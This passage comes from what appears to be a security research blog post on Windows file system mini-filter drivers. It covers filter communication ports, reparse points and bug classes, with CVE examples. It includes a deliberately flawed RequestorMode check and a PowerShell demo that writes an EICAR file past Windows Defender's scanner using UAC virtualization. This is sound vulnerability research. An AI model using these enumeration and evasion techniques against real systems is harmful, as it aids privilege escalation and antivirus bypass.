However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.\n\nThis issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call [FltCreateFileEx](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltcreatefileex>) or [FltWriteFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefile>) and be sure you won\u2019t end up in a loop. \n\nFor file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the [FltInsertExtraCreateParameter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltinsertextracreateparameter>) API. The filter driver can attach the ECP to the request, then check for its presence using [FltFindExtraCreateParameter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltfindextracreateparameter>) API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.\n\nThe second issue is how do you actually pass on the parameters for the IO request to the new file you\u2019ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. 
This is error prone and might introduce subtle security issues.\n\nA better approach is the driver can change the TargetFileObject field in the pre-operation callback\u2019s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:\n\nPREDIRECT_CONTEXT context = // Get driver\u2019s allocated context.\n\nif (context->FileObject) {\n\nData->Iopb->TargetFileObject = context->FileObject;\n\nFltSetCallbackDataDirty(Data);\n\nreturn FLT_PREOP_SUCCESS_NO_CALLBACK;\n\n} \n \n--- \n \n## Mini-Filter Communication\n\nFor there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let\u2019s go through the ways of identifying and analyzing these communication channels.\n\n### Device Object\n\nA mini-filter doesn\u2019t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn\u2019t mean the driver can\u2019t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.\n\nI\u2019m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there\u2019s plenty of other resources. 
For example: Reverse Engineering and Bug Hunting on KMDF Drivers ([video](<https://www.youtube.com/watch?v=puNkbSTQtXY>), [slides](<https://ioactive.com/wp-content/uploads/2018/09/Reverse_Engineering_and_Bug_Hunting_On_KMDF_Drivers.pdf>)).

### Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API [FltCreateCommunicationPort](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltcreatecommunicationport>).

```c
// Default descriptor for the port.
PSECURITY_DESCRIPTOR SecurityDescriptor;
FltBuildDefaultSecurityDescriptor(
    &SecurityDescriptor,
    FLT_PORT_ALL_ACCESS
);

// Name of the port in the Object Manager Namespace.
UNICODE_STRING Name;
RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;
FltCreateCommunicationPort(
    Filter,
    &Port,
    &ObjAttr,
    NULL,                      // ServerPortCookie
    ConnectNotifyCallback,
    DisconnectNotifyCallback,
    MessageNotifyCallback,
    100                        // MaxConnections
);
```

The name of the port is specified using an [OBJECT_ATTRIBUTES](<https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes>) structure; in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the [FltBuildDefaultSecurityDescriptor](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltbuilddefaultsecuritydescriptor>) API to build a security descriptor which only grants administrators access to the port.
However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the [FilterConnectCommunicationPort](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filterconnectcommunicationport>) API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

```c
typedef NTSTATUS
(*PFLT_CONNECT_NOTIFY) (
    PFLT_PORT ClientPort,
    PVOID ServerPortCookie,
    PVOID ConnectionContext,
    ULONG SizeOfContext,
    PVOID *ConnectionPortCookie
);
```

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.
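
The content verification described above, sketched as an added example (not code from the original post or from any real driver): a connect notification callback that checks a hypothetical context layout before using it. The `DEMO_*` names, the context layout and the user-mode stand-in typedefs are assumptions made so the logic compiles outside the WDK.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in types so the logic builds outside the WDK (assumption for this
 * example); the status values are the ones defined in ntstatus.h. */
typedef int32_t NTSTATUS;
typedef uint32_t ULONG;
typedef void *PVOID;
typedef struct _FLT_PORT *PFLT_PORT;
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000)
#define STATUS_INVALID_PARAMETER      ((NTSTATUS)0xC000000D)
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009A)

/* Hypothetical connection context layout; not taken from any real driver. */
#define DEMO_CTX_VERSION     1u
#define DEMO_CTX_KNOWN_FLAGS 0x3u
#define DEMO_CTX_MAX_NAME    520u   /* bytes of UTF-16 */
typedef struct _DEMO_CONNECT_CONTEXT {
    uint32_t Version;
    uint32_t Flags;
    uint32_t NameOffset;   /* bytes from the start of the context */
    uint32_t NameLength;   /* bytes of UTF-16, no terminator */
} DEMO_CONNECT_CONTEXT;

/* Per-client state handed back through ConnectionPortCookie. */
typedef struct _DEMO_CLIENT {
    uint32_t Flags;
    uint32_t NameLength;
    uint16_t Name[DEMO_CTX_MAX_NAME / 2 + 1];
} DEMO_CLIENT;

NTSTATUS ConnectNotifyCallback(PFLT_PORT ClientPort, PVOID ServerPortCookie,
                               PVOID ConnectionContext, ULONG SizeOfContext,
                               PVOID *ConnectionPortCookie)
{
    DEMO_CONNECT_CONTEXT hdr;
    DEMO_CLIENT *client;
    (void)ClientPort;
    (void)ServerPortCookie;
    *ConnectionPortCookie = NULL;

    /* 1. The fixed header must fit before any field is read. */
    if (ConnectionContext == NULL || SizeOfContext < sizeof(hdr))
        return STATUS_INVALID_PARAMETER;
    memcpy(&hdr, ConnectionContext, sizeof(hdr));

    /* 2. Reject unknown versions and undefined flag bits. */
    if (hdr.Version != DEMO_CTX_VERSION || (hdr.Flags & ~DEMO_CTX_KNOWN_FLAGS))
        return STATUS_INVALID_PARAMETER;

    /* 3. The name must be whole UTF-16 units and bounded in size. */
    if (hdr.NameLength == 0 || (hdr.NameLength & 1) ||
        hdr.NameLength > DEMO_CTX_MAX_NAME)
        return STATUS_INVALID_PARAMETER;

    /* 4. The name must lie inside the buffer. Subtract instead of adding
     *    so NameOffset + NameLength can never wrap past SizeOfContext. */
    if (hdr.NameOffset < sizeof(hdr) || hdr.NameOffset > SizeOfContext ||
        hdr.NameLength > SizeOfContext - hdr.NameOffset)
        return STATUS_INVALID_PARAMETER;

    /* 5. Copy what was validated into driver-owned state. A driver would
     *    use a pool allocation and free it in the disconnect callback. */
    client = calloc(1, sizeof(*client));
    if (client == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;
    client->Flags = hdr.Flags;
    client->NameLength = hdr.NameLength;
    memcpy(client->Name, (const uint8_t *)ConnectionContext + hdr.NameOffset,
           hdr.NameLength);
    *ConnectionPortCookie = client;
    return STATUS_SUCCESS;
}

/* Build a constructed context (size must be <= 64) and return the verdict. */
NTSTATUS demo_connect(uint32_t version, uint32_t flags, uint32_t off,
                      uint32_t len, ULONG size)
{
    uint8_t buf[64] = {0};
    DEMO_CONNECT_CONTEXT hdr = { version, flags, off, len };
    PVOID cookie = NULL;
    NTSTATUS status;

    memcpy(buf, &hdr, sizeof(hdr));
    memcpy(buf + sizeof(hdr), "P\0o\0r\0t", 8);   /* UTF-16LE "Port" */
    status = ConnectNotifyCallback(NULL, NULL, buf, size, &cookie);
    free(cookie);
    return status;
}

int main(void)
{
    printf("valid context     : 0x%08X\n", (unsigned)demo_connect(1, 1, 16, 8, 24));
    printf("truncated header  : 0x%08X\n", (unsigned)demo_connect(1, 1, 16, 8, 8));
    printf("name past the end : 0x%08X\n", (unsigned)demo_connect(1, 1, 20, 8, 24));
    return 0;
}
```
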

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my [NtObjectManager](<https://www.powershellgallery.com/packages/NtObjectManager/1.1.29>) PowerShell module run the following command:

```
PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName
----                                      --------
storqosfltport                            FilterConnectionPort
MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort
MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort
WcifsPort                                 FilterConnectionPort
MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort
BindFltPort                               FilterConnectionPort
MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort
CLDMSGPORT                                FilterConnectionPort
MicrosoftMalwareProtectionPortWD          FilterConnectionPort
```

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode.
The simplest way to test is to just try and open the port and see if it returns an access denied error.

```
PS> $ports = ls NtObject:\ |
      Where-Object TypeName -eq "FilterConnectionPort"
PS> foreach($port in $ports.Name) {
      Write-Host "\$port"
      Use-NtObject($p = Get-FilterConnectionPort "\$port") {}
    }
\BindFltPort
Exception: "(0x80070005) - Access is denied."
\CLDMSGPORT
Exception: "(0x8007017C) - The cloud operation is invalid."
```

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

```
PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)
```

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

```
0: kd> !object \CLDMSGPORT
Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort
    ObjectHeader: ffffb487447ff890 (new version)
    HandleCount: 1  PointerCount: 4
    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT

0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)
(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0

0: kd> !sd 0xffff8a888dccb0a0 1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x9004
            SE_DACL_PRESENT
            SE_DACL_PROTECTED
            SE_SELF_RELATIVE
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    :
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x1c
->Dacl    : ->AceCount   : 0x1
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)
->Sacl    :  is NULL
```

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the [FilterSendMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filtersendmessage>) API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

```c
HRESULT FilterSendMessage(
    HANDLE hPort,
    LPVOID lpInBuffer,
    DWORD dwInBufferSize,
    LPVOID lpOutBuffer,
    DWORD dwOutBufferSize,
    LPDWORD lpBytesReturned
);
```

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter.
The callback has the following prototype.

```c
typedef NTSTATUS
(*PFLT_MESSAGE_NOTIFY) (
    IN PVOID PortCookie,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength,
    OUT PULONG ReturnOutputBufferLength
);
```

The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses METHOD_NEITHER, the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

```
PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100
```

For the kernel to user messages the user mode application needs to call [FilterGetMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filtergetmessage>) to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the [FltSendMessage](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltsendmessage>) API which has the following prototype.

```c
NTSTATUS FltSendMessage(
    PFLT_FILTER Filter,
    PFLT_PORT *ClientPort,
    PVOID SenderBuffer,
    ULONG SenderBufferLength,
    PVOID ReplyBuffer,
    PULONG ReplyLength,
    PLARGE_INTEGER Timeout
);
```

If there’s currently no waiting user mode process the API can wait a specified timeout until the application calls FilterGetMessage.
The returned buffer from FilterGetMessage contains a [FILTER_MESSAGE_HEADER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltuserstructures/ns-fltuserstructures-_filter_message_header>) structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the [FilterReplyMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filterreplymessage>) API. The user-mode application needs to append any data to a [FILTER_REPLY_HEADER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltuserstructures/ns-fltuserstructures-_filter_reply_header>) structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.

### Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests. However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system.
This FSCTL is not really supported by any filesystem.

```c
#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILESYSTEM, \
                                     0x801,                  \
                                     METHOD_BUFFERED,        \
                                     FILE_ANY_ACCESS)

FLT_PREOP_CALLBACK_STATUS
PreFsControlOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    // Pass through anything that is not the custom control code.
    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }

    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;
    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,
                       ps->DeviceIoControl.Buffered.OutputBufferLength);
    // Swap from both ends towards the middle, stopping at the midpoint.
    for (ULONG i = 0; i < length / 2; ++i)
    {
        char tmp = buffer[i];
        buffer[i] = buffer[length - i - 1];
        buffer[length - i - 1] = tmp;
    }

    Data->IoStatus.Status = STATUS_SUCCESS;
    Data->IoStatus.Information = length;
    // Complete the request here so it never reaches the file system.
    return FLT_PREOP_COMPLETE;
}
```

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it correctly handles all buffer types if it wants to implement its own control codes.

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code [FSCTL_SET_EXTERNAL_BACKING](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/fsctl-set-external-backing>) is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

### Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS.
However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete using FSCTL control codes, such as [FSCTL_SET_REPARSE_POINT](<https://docs.microsoft.com/en-us/windows/win32/api/winioctl/ni-winioctl-fsctl_set_reparse_point>). The recommended way a mini-filter driver should set and delete a file’s reparse buffer is through the [FltTagFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-flttagfile>) (and [FltTagFileEx](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-flttagfileex>)) and [FltUntagFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltuntagfile>) APIs to set and remove the reparse buffer. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP.
You add the ECP with a buffer containing an [OPEN_REPARSE_LIST_ENTRY](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_open_reparse_list_entry>) structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it’s in the open reparse list. If so, instead of returning STATUS_REPARSE the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and a success NT status code is returned. The filter driver can then check for the flag in the post-create callback; if set it can query the reparse tag from the file, for example using [FSCTL_GET_REPARSE_POINT](<https://docs.microsoft.com/en-us/windows/win32/api/winioctl/ni-winioctl-fsctl_get_reparse_point>), and handle accordingly.

The filter manager also exposes the [FltAddOpenReparseEntry](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltaddopenreparseentry>) and [FltRemoveOpenReparseEntry](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltremoveopenreparseentry>) APIs to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the [REPARSE_DATA_BUFFER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_reparse_data_buffer>) structure which will be written to the file system by calling the kernel API [FsRtlValidateReparsePointBuffer](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-fsrtlvalidatereparsepointbuffer>).
The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.

## Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note, this is not an exhaustive list, I’m sure there are some novel bug classes that I don’t know about which are missing from this list. Which is why it’s good to describe this process in more detail so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from [github](<https://gist.github.com/tyranid/49d8a1b9e53bba4eac40df32e15d4a98>). I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

### Common and garden variety memory safety hazards

Being native C code you can expect the same sorts of issues you’d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

### Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code.
If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, [CVE-2018-0877](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1452>) was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can’t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to read arbitrary files on disk such as the SAM hive. The technique was described separately in [this blog post](<https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html>).

### Incorrect RequestorMode Check.

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants.
For a bit more context on this bug class refer [to my blog post](<https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html>) from last year where I collaborated with Microsoft on related issues.

```c
FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    // RequestorMode is passed through unchanged, so a KernelMode value
    // makes this privilege check succeed unconditionally.
    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege,
                                Data->RequestorMode)) {
        Data->IoStatus.Status = STATUS_ACCESS_DENIED;
        return FLT_PREOP_COMPLETE;
    }

    // Perform some privileged action.
    return FLT_PREOP_SUCCESS_WITH_CALLBACK;
}
```

The example above shows misuse of the RequestorMode field. It passes it directly to [SeSinglePrivilegeCheck](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-sesingleprivilegecheck>); if it indicates the call came from the kernel then the privilege check will always return TRUE meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.

### Driver and Kernel IO Operation Mismatch

The Windows platform is constantly iterating new features; this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.

For the most part the mini-filter driver can just ignore operations it doesn’t care about.
However, if it does process an IO operation it needs to match with what’s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.

An example of this issue is the WOF driver’s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file’s reparse point from being queried or removed if it’s set to IO_REPARSE_TAG_WOF.

The issue [CVE-2020-17139](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2088>) resulted from the OS adding a new [FSCTL_SET_REPARSE_POINT_EX](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/fsctl-set-reparse-point-ex>) IO control code which the WOF driver didn’t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as [Windows Defender Application Control](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control>).

### Altitude sickness.

Sorry, I couldn’t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you’ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver.

What this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them.
Let’s show this in action with a simple PowerShell script.

```powershell
function Write-EICAR {
    param([string]$Path)

    # Replace with a real EICAR string.
    $eicar = [System.Text.Encoding]::ASCII.GetBytes("<EICAR>")
    Use-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {
        $f.Length = 0
        Write-NtFile $f $eicar -Offset 0
    }
}

PS> Write-EICAR -Path "$env:TEMP\eicar.txt"
PS> Enable-NtTokenVirtualization
PS> Write-EICAR -Path "$env:windir\system32\license.rtf"
```

The Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I’ve replaced the EICAR string with the dummy <EICAR>. You’ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.

We create an EICAR file in the temporary folder. Once the file has been closed Windows Defender’s real-time scanner should scan it and warn the user that it has quarantined the file.

However, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user’s virtual store; we’ve not overwritten license.rtf.

It’s worth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender’s signature checks.
However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.

The mismatch with the filter altitude is also a potential reason you’ll miss file events in [Process Monitor](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). Process Monitor runs its mini-filter to capture file events at altitude 385200 which is above LUAFV. You will not see most direct virtualization events. However, we can do something about this: we can use fltmc to detach the Process Monitor filter from a volume and reattach at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.

```
C:\> fltmc detach PROCMON24 C:
C:\> fltmc attach PROCMON24 C: -i "Process Monitor 24 Instance" -a 100
```

You might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won’t work as the driver doesn’t indicate support for that device.

Note that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won’t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes.
The Process Monitor driver does not support attaching at a different altitude through any command line options; this would be one of those cases where it’d be useful for this tooling to be [open source](<https://twitter.com/tiraniddo/status/1284139369788563456>) so that this feature could be added.

As an example, before adding the low altitude instance, if you create the EICAR test file you’ll see the following events:

| ID | Path | Operation | Result | Detail |
|---|---|---|---|---|
